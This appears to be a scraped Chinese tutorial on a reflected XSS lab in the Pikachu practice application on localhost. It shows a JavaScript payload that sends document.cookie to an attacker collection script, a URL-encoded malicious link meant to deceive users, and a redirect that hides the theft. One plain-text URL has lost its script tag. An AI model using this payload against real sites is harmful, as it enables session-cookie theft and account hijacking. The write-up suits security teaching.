XSS攻击:获取用户的cookie(get方式)

您所在的位置:网站首页 cookie欺骗的过程 XSS攻击:获取用户的cookie(get方式)

XSS攻击:获取用户的cookie(get方式)

2024-02-10 06:56| 来源: 网络整理| 查看: 265

关于XSS攻击是什么,想必大家都知道了,今天围绕百度随便找的一张流程图来完成一个获取用户的cookie的XSS实验。 在这里插入图片描述 为了和上图数字一致好看些,从序号1开始吧 0x1 用户登入 自行登入。坑自己就可以了,不要坑别人哈。

0x2 找到漏洞点,制作一个危险的url

让前端插入的js是: document.location = 'http://127.0.0.1/pika/pkxss/xcookie/cookie.php?cookie=' + document.cookie; cookie.php后面讲到攻击者的后台会把代码贴出来。

这是正常的url: http://127.0.0.1/pika/vul/xss/xss_reflected_get.php?message=kobe&submit=submit

用上面的js结合正常的url制作危险的url: http://127.0.0.1/pika/vul/xss/xss_reflected_get.php?message=&submit=submit

0x3一般攻击者发送给用户的都是经过url编码的链接:用户很容易被以xxx(127.0.0.1)开头的域名链接所欺骗 http://127.0.0.1/pika/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location+%3D+%27http%3A%2F%2F127.0.0.1%2Fpika%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27+%2B+document.cookie%3B%3C%2Fscript%3E&submit=submit

0x4 web应用对攻击者的js做出回应 上面那个js脚本不仅获得了用户的cookie经过接受接口一顿操作后header("Location:http://127.0.0.1/pika/index.php"); 重定向到了网站主页,让用户发现不了有什么异常。



【本文地址】


今日新闻


推荐新闻


CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3